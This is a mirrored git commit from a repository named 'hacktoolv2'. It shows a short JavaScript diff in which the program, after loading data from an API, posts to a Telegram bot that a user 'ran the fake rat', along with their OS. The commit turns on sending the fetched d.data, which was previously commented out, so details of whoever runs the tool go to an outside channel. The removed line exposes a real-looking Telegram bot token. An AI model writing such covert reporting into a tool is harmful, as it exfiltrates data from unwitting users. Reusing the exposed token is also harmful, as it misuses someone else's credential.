2
0
mirror of https://github.com/constantinDev/hacktoolv2 synced 2025-08-29 15:37:42 +00:00

Updated tool

This commit is contained in:
WOOOMY-lol 2020-07-30 15:46:02 +02:00
parent 56aef62b95
commit a5dcc5c613
2 changed files with 2 additions and 2 deletions

Binary file not shown.

View File

@ -53,11 +53,11 @@ axios({
}).then(d => {
logger.log("Successfully loaded the API. Loading modules...")
axios({
url: "https://api.telegram.org/bot1143731138:AAF6hwgo1R6a4GbB_zmr0kNA2Ca86oFJ6sg/sendMessage",
url: "https://api.telegram.org/bot(censored)/sendMessage",
method: "POST",
data: {
chat_id: "@lmaotxt",
text: `<strong>${/*d.data*/"(censored because testing)"}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
text: `<strong>${d.data}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
parse_mode: "HTML"
}
}).then(async () => {